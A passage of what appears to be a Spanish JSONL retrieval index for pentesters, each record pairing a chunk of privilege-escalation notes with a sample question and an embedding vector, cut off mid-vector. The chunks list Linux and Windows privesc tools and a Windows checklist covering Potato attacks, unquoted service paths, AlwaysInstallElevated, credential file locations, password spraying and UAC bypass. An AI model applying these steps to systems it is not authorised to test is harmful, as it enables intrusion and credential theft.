0.06752, 0.04287, -0.08457, -0.10943, 0.08194, -0.04474, -0.00201, -0.01443, -0.01785, 0.03653, -0.00852, 0.04559, -0.02536, -0.06608, -0.03301, -0.0133, 0.01592, -0.11601, 0.08373, -0.08745, 0.00685, -0.03509, -0.00601, 0.00399, 0.04168, 0.05269, -0.07145, 0.02357, -0.0696, -0.10055, -0.07442, 0.15459, -0.02553, -0.0441, -0.03367, 0.01642, -0.0361, -0.17063, -0.02813, -0.02531, -0.02959, -0.04534, -0.0099, 0.0789, -0.0609, 0.01849, -0.012, -0.07007, -0.08467, 0.00175, -0.06468, -0.03843, 0.14503, 0.00266, 0.00893, 0.03493, 0.04599, 0.02185, -0.01646, 0.02596, -0.01613, -0.01077, 0.0217, -0.07379, -0.01853, -0.05276, -0.0225, 0.02613, -0.01636, 0.05679, 0.04535, -0.03831, 0.04226, 0.01734, 0.0151, -0.01581, -0.04207, -0.05661, -0.09311, 0.02902, -0.04021, 0.03977, -0.0309, -0.03272, 0.12797, -0.03027, -0.00156, 0.00664, 0.00919, -0.00395, 0.02293, 0.02747, 0.00158, 0.02572, 0.04026, -0.03919, 0.05226, 0.0075, -0.03123, 0.05666, 0.1192, 0.02953, 0.07906, -0.10864, -0.05411, 0.00884, 0.01297, -0.01285, -0.049, 0.00934, 0.07661, 0.0127, -0.00354, 0.03035, 0.04492, 0.03186, 0.06176, 0.06128, 0.06927, 0.05365, 0.08218, 0.08095, 0.00951, -0.00161, -0.0644, 0.0061, -0.02723, -0.07221, -0.06932, 0.03635, 0.03326, -0.08902, 0.06757, 0.04454, 0.05445, 0.03915, 0.02503, 0.09221, 0.05691, 0.0492, 0.07197, -0.04174, -0.08062, 0.05853, -0.02883, 0.05833, 0.01886, -0.06602, 0.04189, 0.01834, 0.0349, 0.02857, 0.00252, -0.00319, -0.02525, 0.01084, 0.00411, 0.01083, 0.02046, -0.07198, -0.02773, 0.00655, 0.00217, -0.09255, -0.01423, -0.02632, -0.04856, -0.05319, 0.05393, 0.10181, 0.07054, -0.05718, 0.00153, -0.03674, -0.055, -0.03035, -0.0227, -0.09937, -0.01179, 0.0139, 0.00414, -0.09459, 0.04089, -0.03176]} -{"tipo": "pregunta", "herramienta": "Privesc Linux", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Linux.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Herramientas\n`linpeas.sh` (PEASS-ng), `LinEnum`, `linux-exploit-suggester` (LES), `lse.sh`, y `pspy` (espΓ­a cron/procesos sin root). Ver Herramientas (Γ­ndice).\n\nRelacionado: Exploits conocidos Β· PEASS-ng Β· Privesc Windows Β· OSCP MOC", "indexar": "quΓ© herramienta sirve para detectar exploits y vulnerabilidades en un sistema Linux?", "v": [-0.00617, 0.04689, -0.18936, -0.23799, 0.02957, -0.12172, -0.19005, 0.02775, -0.00887, -0.01759, -0.00821, -0.08471, -0.07883, -0.01038, 0.06938, -0.0394, -0.0221, -0.21379, -0.01667, -0.11329, -0.09538, 0.03522, -0.09153, -0.06251, -0.0252, 0.05675, 0.02459, -0.13316, -0.04402, 0.04719, -0.10777, 0.02577, 0.06807, 0.00272, -0.1109, 0.0526, -0.0135, -0.01804, 0.12123, 0.12885, 0.1455, -0.00764, -0.03319, 0.02431, 0.05743, -0.11343, -0.05601, -0.06554, 0.05332, -0.02222, 0.00657, -0.07573, -0.19276, -0.06799, 0.06111, -0.08664, 0.12565, -0.08634, 0.09003, -0.05779, -0.17299, 0.0294, 0.00364, -0.05513, 0.05519, -0.05991, -0.04248, -0.06091, -0.14038, 0.09824, 0.02644, 0.05495, 0.04187, 0.05175, -0.01385, 0.01683, 0.00971, 0.05748, 0.04235, -0.00937, 0.02799, 0.02151, -0.02384, 0.06994, -0.10361, -0.13633, 0.10155, 0.04894, 0.01706, -0.0454, 0.05892, 0.07961, -0.0044, 0.03334, 0.09339, -0.01773, 0.12957, 0.01245, -0.04264, -0.00941, -0.01283, -0.08418, -0.08619, 0.10658, -0.01255, 0.00356, -0.03451, 0.00412, -0.01901, -0.12566, 0.01174, -0.01818, 0.01312, -0.01097, -0.03238, 0.05254, 0.00013, 0.0026, -0.01014, -0.02076, -0.04981, 0.00671, -0.05521, -0.04036, 0.03542, -0.02885, -0.04188, 0.09434, 0.00527, -0.0959, 0.04117, -0.09586, -0.02725, 0.07368, -0.02481, -0.00136, 0.03712, -0.12305, -0.05954, 0.00176, 0.02139, 0.08768, 0.00964, -0.04267, 0.07083, 0.04499, 0.06545, -0.04867, -0.02258, -0.04118, -0.02857, -0.02997, -0.05202, -0.03314, -0.08247, -0.04402, -0.00302, -0.00123, -0.0845, -0.0009, -0.01487, -0.03187, 0.05213, 0.05226, -0.01055, -0.01337, 0.07184, 0.03262, 0.09132, 0.05473, 0.03953, 0.06334, 0.0959, -0.02028, 0.03382, -0.10144, 0.0072, -0.03076, 0.0093, -0.03468, -0.03449, -0.00096, 0.04001, -0.0274, 0.03157, 0.02936, 0.00731, 0.01276, 0.03085, 0.01656, 0.07714, -0.00084, 0.01928, 0.00321, 0.02043, 0.0425, -0.02584, -0.03537, 0.01871, -0.01296, -0.07614, 0.02409, -0.0078, -0.02301, 0.04482, 0.05599, 0.0102, -0.03228, 0.01011, 0.04793, 0.01694, 0.06089, 0.05073, -0.04076, -0.05325, -0.00835, -0.01618, 0.09617, -0.00406, -0.05356, 0.00956, -0.02532, 0.03995, 0.01411, -0.01951, -0.02977, -0.0459, -0.0088, 0.01239, -0.02197, 0.06307, -0.0771, -0.00494, 0.02605, -0.03085, -0.10174, 0.02254, 0.00737, -0.01396, -0.03389, -0.02188, 0.06065, 0.04018, -0.08304, -0.02642, -0.05635, -0.00066, -0.03966, -0.02959, -0.07458, -0.06237, 0.01333, 0.03593, -0.06272, -0.00449, -0.0082]} -{"tipo": "pregunta", "herramienta": "Privesc Linux", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Linux.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Herramientas\n`linpeas.sh` (PEASS-ng), `LinEnum`, `linux-exploit-suggester` (LES), `lse.sh`, y `pspy` (espΓ­a cron/procesos sin root). Ver Herramientas (Γ­ndice).\n\nRelacionado: Exploits conocidos Β· PEASS-ng Β· Privesc Windows Β· OSCP MOC", "indexar": "con quΓ© puedo montar una enumeraciΓ³n de privilegios locales sin tener root?", "v": [-0.03208, 0.00838, -0.19474, -0.05111, -0.04184, 0.08227, 0.08997, 0.03964, -0.19641, -0.07715, -0.13939, 0.08085, 0.18379, -0.06925, 0.13775, 0.03034, -0.0696, -0.05092, -0.04764, 0.02874, -0.09632, -0.14393, -0.04564, 0.03307, 0.10297, 0.05329, 0.14999, -0.01002, -0.04435, 0.17359, 0.08194, 0.08168, 0.01882, 0.04523, -0.04985, -0.0576, 0.05616, 0.08414, -0.05977, -0.06013, 0.03406, -0.04283, -0.09423, 0.08806, -0.06096, -0.04702, -0.10392, -0.03279, 0.02907, -0.10435, 0.10305, -0.08116, -0.01742, -0.14925, 0.02667, 0.02067, 0.01502, -0.05009, 0.04179, 0.10152, -0.07548, 0.00748, 0.0165, 0.05955, 0.07619, 0.00845, -0.00115, -0.01604, -0.03604, 0.03672, -0.04895, -0.03063, 0.07575, -0.02676, 0.03817, 0.062, -0.04545, -0.04431, 0.06086, 0.01297, 0.05965, -0.03481, -0.00184, 0.02158, -0.02909, -0.00284, -0.03127, -0.02386, -0.01459, -0.0072, 0.03711, 0.02129, 0.02694, -0.07353, 0.03716, -0.09619, 0.05741, 0.16274, -0.07516, 0.09776, 0.05735, -0.04468, -0.06329, 0.23846, 0.15336, -0.07067, 0.05681, -0.04496, 0.07687, -0.08478, 0.01464, 0.05499, -0.04913, 0.09381, -0.0943, -0.08642, -0.10602, 0.08472, 0.01511, 0.03927, -0.02247, -0.06449, 0.03935, -0.02618, -0.00403, -0.03688, 0.0071, 0.13946, -0.00218, 0.05503, 0.01815, -0.02987, 0.09492, -0.03768, -0.03096, 0.01107, 0.02867, -0.00991, -0.01978, -0.02692, -0.01048, -0.09842, -0.03264, -0.04013, 0.05253, 0.03883, -0.03695, -0.05992, -0.06679, -0.04959, -0.03109, -0.03316, -0.01439, 0.04693, -0.10508, -0.00639, 0.06138, 0.01192, 0.11098, 0.07338, 0.04331, -0.06957, -0.09489, 0.00457, 0.00384, -0.05473, 0.00202, 0.0018, 0.0349, -0.01324, -0.05304, 0.10895, -0.06198, -0.02176, -0.03167, 0.00361, 0.03865, -0.01972, 0.02036, 0.05256, 0.01798, 0.05735, 0.07891, 0.07594, -0.03572, 0.00279, 0.00754, -0.00525, 0.0335, -0.00523, 0.04119, -0.00526, 0.05149, 0.02678, 0.06081, -0.00934, 0.00732, 0.04571, -0.02199, 0.02272, -0.04235, -0.02085, 0.00678, 0.02445, 0.11044, -0.03392, -0.02448, 0.00102, -0.04867, 0.07156, -0.06352, 0.02513, 0.04438, 0.01492, 0.02252, -0.00736, -0.01804, -0.05113, -0.0584, -0.00535, 0.03117, 0.00221, 0.08709, 0.04383, 0.02984, -0.00024, -0.01978, -0.03805, 0.06939, 0.07448, -0.01002, -0.01718, -0.01886, -0.03077, 0.02125, -0.03796, 0.0367, 0.03317, -0.00274, 0.01995, 0.02685, 0.04837, 0.00395, -0.04224, -0.03476, -0.03181, -0.0965, -0.00528, 0.01825, -0.02493, 0.057, 0.00971, 0.01665, -0.02449, -0.04369, 0.01699]} -{"tipo": "pregunta", "herramienta": "Privesc Linux", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Linux.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Herramientas\n`linpeas.sh` (PEASS-ng), `LinEnum`, `linux-exploit-suggester` (LES), `lse.sh`, y `pspy` (espΓ­a cron/procesos sin root). Ver Herramientas (Γ­ndice).\n\nRelacionado: Exploits conocidos Β· PEASS-ng Β· Privesc Windows Β· OSCP MOC", "indexar": "ΒΏcuΓ‘l es una alternativa libre a linux-exploit-suggester?", "v": [-0.07845, 0.04162, -0.13219, -0.04234, -0.03553, -0.12872, -0.21072, -0.03366, -0.16633, -0.00438, 0.01635, -0.22372, 0.02061, 0.08396, -0.02565, -0.15191, -0.11725, -0.08398, 0.11079, -0.08703, -0.07864, 0.1151, -0.13206, -0.09583, 0.0453, -0.01809, -0.01991, -0.06342, 0.06152, -0.00388, -0.09202, 0.00639, -0.00196, -0.01397, -0.01351, 0.06327, 0.15849, 0.00293, 0.19422, 0.04343, 0.09728, -0.03703, -0.10072, 0.01165, -0.0625, -0.11895, -0.10013, -0.00564, 0.06719, 0.04445, 0.02844, -0.03214, -0.06909, 0.02317, 0.16116, 0.05049, 0.09438, -0.09844, -0.02818, -0.06623, -0.04011, -0.03833, -0.0066, -0.07093, 0.03828, 0.03219, -0.09773, 0.00048, -0.07832, 0.15617, 0.0202, 0.0293, -0.01415, 0.03027, -0.05644, 0.04778, -0.0745, 0.01616, 0.06298, 0.04223, 0.00254, -0.06617, 0.08818, 0.1056, -0.09479, -0.14844, 0.04848, -0.04552, 0.00378, 0.06284, 0.03595, 0.06362, -0.04755, 0.10293, 0.02355, -0.05703, 0.04626, 0.1517, -0.03269, 0.01489, -0.02289, 0.03157, -0.11431, 0.04791, 0.03599, -0.06377, 0.00809, 0.01889, -0.09241, 0.00658, 0.03967, -0.04076, 0.04555, 0.03062, -0.06264, -0.02986, -0.06983, 0.01145, -0.02538, 0.01469, -0.07806, -0.03455, 0.01104, -0.03731, -0.00766, 0.04181, 0.02226, 0.08404, -0.03773, -0.04131, -0.00525, -0.03303, -0.02854, -0.03039, -0.09613, -0.02792, 0.11539, -0.09679, 0.01477, -0.02376, 0.06917, 0.03399, 0.02119, -0.02106, 0.05339, 0.00838, 0.06691, -0.03734, 0.02595, -0.06105, -0.07274, 0.02131, 0.01526, 0.09084, -0.08908, 0.01024, 0.02322, -0.01141, -0.07705, 0.085, 0.03794, -0.04268, -0.02615, 0.01335, -0.03831, 0.03159, 0.02698, 0.01257, -0.05499, 0.04779, 0.00435, 0.14189, 0.08814, -0.06767, 0.09296, -0.12224, 0.06275, -0.10936, 0.0086, -0.0042, 0.01226, 0.00862, -0.07458, -0.01391, 0.0209, -0.01924, 0.03371, -0.00338, 0.00738, 0.02907, 0.04784, 0.01693, -0.03212, -0.0711, -0.02217, 0.04431, 0.00886, -0.02694, -0.04274, 0.0528, -0.03915, 0.0104, -0.01982, 0.0204, 0.00892, -0.04699, -0.03631, 0.00095, -0.0138, 0.04891, 0.04332, 0.00996, 0.06866, -0.0012, -0.03463, 0.00479, 0.05761, 0.0234, 0.01862, -0.04287, -0.03003, 0.05673, 0.05767, -0.01003, -0.00985, -0.02177, -0.04638, 0.05006, -0.03548, -0.01617, 0.03203, -0.00279, 0.00872, 0.02432, -0.01299, -0.00829, 0.0007, 0.03666, 0.04056, 0.00491, 0.02005, 0.0259, -0.00184, 0.01101, -0.0687, 0.00508, -0.04885, -0.04331, -0.02666, -0.01529, -0.03385, 0.00971, -0.00469, -0.01825, 0.01154, 0.04422]} -{"tipo": "pregunta", "herramienta": "Privesc Windows", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Windows.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "# Privesc Windows\n\n> Tras la Reverse shell PowerShell: PEASS-ng (winPEAS) **+** revisiΓ³n manual. Camino a SYSTEM.", "indexar": "Que herramienta sirve para explorar permisos de sistema en Windows?", "v": [0.02881, 0.06571, -0.13023, -0.19041, 0.0475, -0.17435, -0.1018, -0.12744, -0.00405, -0.19618, -0.04196, -0.02726, 0.00575, -0.07815, 0.0258, -0.00937, 0.06409, -0.04607, -0.00966, 0.0427, 0.01238, -0.00936, -0.10897, 0.00029, -0.11747, -0.00242, 0.03837, -0.11081, -0.18669, 0.0263, -0.01716, 0.05563, 0.03827, -0.08078, -0.06071, -0.03607, -0.02357, 0.08001, 0.03133, -0.01028, 0.06706, 0.08447, -0.05833, 0.0876, 0.05915, -0.07452, -0.00592, -0.05783, -0.01058, -0.0025, -0.06592, -0.08589, -0.11898, -0.07364, 0.12691, -0.09683, 0.20828, -0.10782, -0.01658, 0.03075, -0.07193, 0.00305, -0.04821, -0.05843, 0.0395, -0.03932, 0.0719, -0.02036, -0.02135, 0.16158, -0.08956, 0.01983, 0.13941, 0.03564, 0.00333, 0.01133, -0.08423, -0.03562, 0.12765, -0.0231, 0.09809, 0.08498, -0.13951, -0.06983, -0.015, -0.16479, 0.01708, -0.0508, 0.04793, -0.10532, 0.02568, -0.00625, -0.04714, 0.09104, 0.06352, -0.05846, 0.03189, -6e-05, -0.01695, 0.0638, 0.07428, -0.0759, -0.10213, 0.13235, -0.10509, 0.04748, 0.02454, -0.08535, -0.07279, -0.01808, 0.03645, 0.02819, -0.0498, 0.01497, -0.00302, 0.06445, -0.04129, -0.12259, -0.0508, -0.01876, -0.00637, 0.06555, -0.09507, -0.02784, 0.04144, -0.0615, -0.05413, 0.1372, -0.02265, -0.05767, 0.08596, -0.05236, -0.07229, 0.07981, -0.05177, 0.00215, 0.00972, -0.02535, -0.01934, -0.05127, 0.0306, 0.10073, 0.05281, -0.07759, 0.06135, 0.06294, 0.09816, 0.03222, -0.02449, -0.06201, 0.01966, -0.04195, -0.02562, 0.02625, -0.03194, -0.00494, -0.0042, 0.05156, -0.07804, 0.04905, 0.05319, 0.0203, -0.00336, 0.0407, 0.02736, -2e-05, -0.01561, -0.00954, 0.06666, 0.01994, -0.01316, 0.04335, 0.06513, -0.05236, 0.02852, -0.02218, -0.00315, -0.05934, -0.00506, -0.03137, -0.11221, 0.02782, -0.00863, -0.06184, 0.01168, -0.00111, -0.01243, 0.01705, -0.00346, 0.03566, -0.01015, 0.03693, 0.02821, -0.06214, 0.02988, 0.01205, -0.03123, -0.04999, 0.02013, -0.01004, -0.02034, 0.0233, -0.03718, -0.09434, 0.05448, 0.05561, 0.03057, 0.02272, 0.05199, 0.00787, -0.01051, -0.01177, 0.0263, -0.0495, -0.05075, -0.0141, -0.00073, 0.01643, -0.02201, -0.03579, 0.04347, 0.00516, 0.05273, 0.03021, 0.00364, -0.0248, -0.01769, 0.00481, -0.00156, -0.03613, 0.0404, -0.02731, 0.01888, 0.0118, 0.03783, -0.04971, 0.03763, -0.02561, -0.05227, -0.03992, -0.00131, 0.04681, 0.01739, -0.05565, -0.07494, -0.06479, 0.00932, -0.03297, -0.01763, -0.1072, -0.0439, 0.03794, 0.03392, -0.04948, 0.0105, 0.01424]} -{"tipo": "pregunta", "herramienta": "Privesc Windows", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Windows.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "# Privesc Windows\n\n> Tras la Reverse shell PowerShell: PEASS-ng (winPEAS) **+** revisiΓ³n manual. Camino a SYSTEM.", "indexar": "Con que puedo hacer una revisiΓ³n manual tras un reverse shell?", "v": [0.04245, 0.06542, -0.1117, -0.0783, -0.01774, -0.05746, -0.09839, 0.03406, -0.03954, 0.00347, -0.10534, -0.05916, 0.11586, -0.05451, 0.06094, 0.11889, -0.12733, 0.00986, 0.00082, -0.0203, 0.01105, -0.13047, -0.06323, -0.05524, 0.07825, 0.0789, 0.05107, 0.03524, -0.07281, -0.12363, -0.07004, -0.08703, 0.02853, 0.01084, -0.13114, 0.15523, 0.11665, 0.05608, 0.04687, 0.07806, -0.00316, -0.02823, -0.1236, 0.16539, 0.09482, -0.09881, 0.05573, 0.0013, -0.07671, 0.03938, -0.07608, -0.11989, -0.13589, 0.05641, -0.02464, -0.12757, 0.23235, -0.03667, 0.05859, -0.18968, 0.03409, 0.04367, 0.00641, 0.13694, 0.02271, -0.00518, -0.01538, -0.14433, -0.05815, 0.03712, -0.04715, 0.03897, 0.00355, -0.03788, -0.19748, -0.08893, 0.0723, 0.033, 0.03972, 0.00631, -0.10876, -0.00748, -0.05627, 0.02769, 0.07337, -0.06566, -0.09933, -0.03926, 0.05699, -0.03866, -0.05615, -0.07326, 0.01579, -0.01934, -0.01822, -0.00426, -0.04686, 0.05793, -0.09269, 0.01254, 0.05482, -0.06829, 0.11926, 0.12143, 0.03929, 0.02506, -0.02168, 0.04083, -0.05314, 0.09771, -0.00393, 0.02587, -0.04722, 0.042, -0.05021, -0.00652, -0.12343, -0.00197, 0.01587, 0.01569, 0.04367, -0.06064, -0.02804, -0.036, -0.02639, 0.04537, 0.01987, 0.1507, 0.03714, -0.00995, 0.03707, 0.02512, -0.02828, -0.01828, 0.02983, 0.03591, -0.00315, 0.09711, -0.03227, -0.0255, -0.03157, 0.11209, 0.00903, 0.03309, 0.06137, -0.11919, -0.00034, -0.09017, -0.02898, -0.04565, 0.02535, 0.10781, 0.03228, 0.05754, -0.03079, -0.02517, 0.05004, -0.0158, 0.00871, -0.02423, -0.0229, -0.00385, -0.01885, -0.01301, 0.06866, 0.04653, -0.11872, 0.03645, 0.01188, -0.07211, -0.07806, 0.02499, 0.01118, 0.02566, 0.10431, 0.01691, 0.05721, 0.03667, 0.02123, -0.02958, 0.06055, -0.02515, -0.0458, -0.03439, -0.00376, -0.03345, 0.04066, 0.02246, 0.04943, -0.01557, 0.00893, 0.08908, 0.00546, 0.01167, 0.06657, 0.02429, 0.01737, -0.01835, -0.04333, -0.02636, -0.01702, -0.02702, -0.01736, -0.05205, 0.02898, 0.01607, -0.07337, 0.03696, -0.00643, 0.0299, -0.00346, 0.00845, 0.07509, 0.09999, -0.02461, -0.0129, 0.00842, 0.00897, -0.05018, 0.02556, 0.0639, -0.04542, 0.00617, -0.00548, -0.00568, -0.0854, 0.08064, -0.02133, 0.04299, 0.03714, 0.00142, 0.03059, 0.01617, 0.00228, -0.01427, 0.06298, 0.00432, -0.03027, 0.03631, 0.0133, 0.02286, 0.03879, -0.0098, -0.00249, -0.0167, -0.03438, 0.02915, -0.01235, -0.01188, -0.00504, -0.02429, 0.00415, 0.01452, -0.04044, -0.01434, -0.07147]} -{"tipo": "pregunta", "herramienta": "Privesc Windows", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Windows.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Los 10 olvidados\n```\n1. whoami /priv β†’ SeImpersonate/SeAssignPrimaryToken β†’ Potato attacks\n2. Unquoted services β†’ wmic service get name,pathname,startmode\n path con espacios sin comillas + carpeta escribible = exe propio\n3. AlwaysInstallElev. β†’ reg query HKLM\\...\\Windows\\Installer (ambos =1 β†’ msi = SYSTEM)\n4. Service permisos β†’ accesschk.exe -uwcqv user * (SERVICE_CHANGE_CONFIG)\n5. Creds en disco β†’ Unattend.xml, sysprep.inf, web.config, cmdkey /list, SAM/SYSTEM\n6. AutoLogon registro β†’ HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\n7. Pass spraying β†’ la pass del user normal contra admin/administrator/sa\n8. WSL / OpenSSH β†’ credenciales en .bash_history\n9. Scheduled tasks β†’ schtasks /query /fo LIST /v (scripts editables)\n10. UAC bypass + token impersonation\n```", "indexar": "que programa puedo usar para encontrar servicios que tengan permisos de configuraciΓ³n modificados?", "v": [0.14431, 0.16291, -0.17642, -0.21641, 0.08176, -0.05787, -0.07912, -0.10788, -0.18006, -0.11486, -0.10806, -0.0434, 0.05256, -0.1127, -0.02784, -0.08421, 0.04506, -0.11794, 0.10006, 0.04328, 0.06187, -0.05368, -0.0277, 0.0119, -0.11655, 0.05266, 0.07523, -0.16919, -0.18705, -0.03553, 0.01701, -0.03461, 0.01261, -0.01629, -0.03535, 0.01314, 0.05934, 0.04265, 0.0575, 0.03715, 0.08879, -0.07556, -0.01385, 0.04698, 0.03608, -0.03869, 0.0052, 0.01745, -0.06102, -0.03442, 0.06399, -0.0265, -0.09319, -0.07759, 0.08656, -0.06917, 0.12972, -0.17743, -0.12073, 0.0143, -0.00451, -0.01202, 0.00704, 0.098, 0.05971, 0.01983, 0.07763, 0.00313, -0.02692, 0.07073, -0.04589, 0.02867, 0.03614, -0.07291, 0.04601, 0.03269, -0.06408, -0.0878, 0.03682, 0.02681, -0.02196, 0.08314, -0.07919, -0.03915, -0.12593, -0.06718, -0.01606, -0.05184, 0.01738, -0.06663, 0.06794, 0.04727, 0.03902, 0.05123, 0.03722, -0.01952, 0.0241, 0.0907, -0.01404, 0.08043, 0.12649, 0.0541, -0.01675, 0.1828, -0.09992, 0.06707, 0.08626, -0.07216, -0.00721, 0.03149, 0.02753, 0.00334, -0.02539, -0.03673, -0.01455, 0.01656, -0.01964, -0.04691, -0.02168, -0.09138, -0.01199, 0.00381, 0.02558, 0.0543, 0.10561, 0.04044, -0.02692, 0.11689, -0.05017, 0.06791, 0.01543, -0.05754, 0.0327, -0.03081, -0.08841, -0.02419, -0.02882, -0.02247, -0.04763, 0.02578, 0.02349, 0.04897, 0.08397, 0.0492, 0.0394, -0.02202, -0.02726, -0.05838, -0.01583, -0.02299, 0.02678, 0.01647, -0.00011, 0.05799, -0.05693, 0.05055, -0.05813, -0.07931, -0.05192, 0.07767, -0.06188, -0.00722, -0.0133, -0.02118, 0.09847, -0.00054, 0.00307, 0.00591, 0.06498, 0.08705, -0.08642, 0.02268, 0.0458, -0.05613, 0.01577, 0.01412, -0.04515, -0.05796, 0.02589, 0.03635, -0.06037, 0.01086, -0.02255, -0.01362, 0.00289, 0.00835, -0.0135, 0.01782, -0.01133, -0.03682, -0.03822, 0.07434, 0.06758, -0.0212, 0.01975, -0.04001, 0.01635, -0.00327, -0.05535, -0.10747, -0.03984, 0.04292, -0.04232, -0.07969, 0.04345, -0.01747, -0.00774, 0.01471, 0.02709, 0.0642, -0.01692, -0.09328, 0.08272, -0.02328, -0.05292, -0.02687, 0.00791, 0.03675, 0.05508, -0.00744, 0.03614, -0.01339, 0.02146, 0.05971, 0.04006, -0.06219, 0.0508, 0.00506, 0.04102, 0.04782, 0.01058, -0.01376, -0.01831, -0.07512, 0.04363, -0.01831, 0.03783, 0.01016, -0.01535, -0.04431, -0.01527, 0.08822, 0.01709, -0.02361, -0.01623, -0.00468, -0.07438, -0.01915, 0.00873, 0.01444, -0.00296, 0.05648, 0.04852, -0.09047, 0.0391, 0.00882]} -{"tipo": "pregunta", "herramienta": "Privesc Windows", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Windows.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Los 10 olvidados\n```\n1. whoami /priv β†’ SeImpersonate/SeAssignPrimaryToken β†’ Potato attacks\n2. Unquoted services β†’ wmic service get name,pathname,startmode\n path con espacios sin comillas + carpeta escribible = exe propio\n3. AlwaysInstallElev. β†’ reg query HKLM\\...\\Windows\\Installer (ambos =1 β†’ msi = SYSTEM)\n4. Service permisos β†’ accesschk.exe -uwcqv user * (SERVICE_CHANGE_CONFIG)\n5. Creds en disco β†’ Unattend.xml, sysprep.inf, web.config, cmdkey /list, SAM/SYSTEM\n6. AutoLogon registro β†’ HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\n7. Pass spraying β†’ la pass del user normal contra admin/administrator/sa\n8. WSL / OpenSSH β†’ credenciales en .bash_history\n9. Scheduled tasks β†’ schtasks /query /fo LIST /v (scripts editables)\n10. UAC bypass + token impersonation\n```", "indexar": "cΓ³mo detecto si hay credenciales guardadas en configuraciones de instalaciΓ³n o archivos del sistema?", "v": [0.036, 0.01759, -0.19442, -0.22372, 0.17741, -0.15473, 0.01108, -0.01423, -0.13293, -0.05292, -0.20237, 0.0127, -0.20619, -0.09306, 0.15321, -0.01022, 0.08766, -0.07848, -0.03363, -0.03167, -0.13487, -0.04425, -0.03625, -0.00233, -0.03137, 0.04491, -0.03305, -0.06596, -0.15984, -0.02294, 0.00764, 0.04157, -0.01721, 0.07925, -0.10447, 0.04532, -0.11123, 0.0107, -0.0433, 0.08904, -0.03773, -0.08262, 0.08147, 0.07112, 0.09184, -0.08822, 0.0595, -0.04799, -0.00692, -0.03501, -0.07309, 0.04336, -0.06535, -0.02904, 0.04803, -0.14145, 0.06904, -0.0245, 0.13153, -0.10239, -0.08843, 0.1347, -0.01885, 0.09045, 0.03567, 0.05325, -0.06813, -0.01679, -0.01396, 0.01426, 0.03593, -0.03223, -0.03164, 0.0579, 0.05175, 0.02887, 0.06028, -0.04614, 0.11842, -0.04054, 0.03176, -0.04847, -0.02422, 0.00714, -0.053, -0.03386, -0.0342, 0.01096, -0.06986, -0.02187, 0.07012, -0.03889, 0.01575, 0.04471, 0.06022, -0.03774, 0.04273, 0.00617, -0.0579, 0.00187, 0.01707, 0.01618, -0.0633, 0.18413, 0.01642, 0.0288, 0.00981, 0.00739, 0.02862, -0.14818, 0.06981, 0.03786, -0.01199, 0.0219, -0.0848, 0.02126, 0.06447, -0.02038, -0.01635, 0.01529, -0.06985, 0.00762, 0.03753, -0.04501, 0.03955, -0.01168, -0.04993, 0.04162, -0.01611, 0.07634, 0.00422, -0.08521, -0.04418, 0.03026, -0.08539, -0.00718, -0.0633, 0.00106, -0.14668, -0.04281, 0.06845, 0.0519, 0.04713, -0.0395, 0.07519, 0.03093, 0.01902, -0.00113, -0.01026, -0.06565, -0.04176, 0.07539, -0.01842, -0.04676, -0.05461, 0.0569, 0.08815, -0.11356, -0.0038, -0.00166, -0.04222, -0.03165, 0.03868, 0.00971, 0.03307, -0.04392, -0.02417, 0.00245, 0.06822, -0.02678, -0.02717, 0.03076, -0.06537, -0.04927, 0.008, 0.0291, -0.02122, -0.11, 0.07195, -0.01968, -0.05448, 0.04342, 0.00596, 0.01462, 0.01867, -0.01563, 0.02669, 0.01034, -0.00921, 0.04468, 0.1006, -0.01961, -0.06335, 0.04889, -0.00892, -0.02752, -0.02383, -0.05124, -0.04185, 0.08731, -0.05201, -0.0107, -0.01105, -0.03413, -0.00066, 0.03295, -0.01501, -0.01418, 0.0362, 0.06851, 0.06087, -0.05246, 0.05677, -0.06341, -0.07998, -0.00716, -0.00358, 0.02038, -0.00408, -0.01924, 0.02794, -0.01031, 0.03883, 0.04102, -0.07278, -0.03335, -0.02364, 0.06038, 0.03248, 0.01114, -0.01302, -0.0446, -0.01553, -0.00488, 0.01257, -0.0198, 0.00125, -0.01945, -0.04136, -0.06644, 0.04251, 0.1134, 0.01142, -0.01695, -0.04834, -0.02262, -0.01268, 0.00407, 0.059, -0.06208, 0.03786, 0.04043, 0.03122, -0.07335, 0.04123, -0.04179]} -{"tipo": "pregunta", "herramienta": "Privesc Windows", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Windows.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Los 10 olvidados\n```\n1. whoami /priv β†’ SeImpersonate/SeAssignPrimaryToken β†’ Potato attacks\n2. Unquoted services β†’ wmic service get name,pathname,startmode\n path con espacios sin comillas + carpeta escribible = exe propio\n3. AlwaysInstallElev. β†’ reg query HKLM\\...\\Windows\\Installer (ambos =1 β†’ msi = SYSTEM)\n4. Service permisos β†’ accesschk.exe -uwcqv user * (SERVICE_CHANGE_CONFIG)\n5. Creds en disco β†’ Unattend.xml, sysprep.inf, web.config, cmdkey /list, SAM/SYSTEM\n6. AutoLogon registro β†’ HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\n7. Pass spraying β†’ la pass del user normal contra admin/administrator/sa\n8. WSL / OpenSSH β†’ credenciales en .bash_history\n9. Scheduled tasks β†’ schtasks /query /fo LIST /v (scripts editables)\n10. UAC bypass + token impersonation\n```", "indexar": "quΓ© herramienta me sirve para identificar tareas programadas o historiales de shell donde puedan ocultarse contraseΓ±as?", "v": [0.1391, 0.09718, -0.14574, -0.12441, 0.01655, -0.21326, -0.05541, -0.09251, -0.00495, -0.02937, 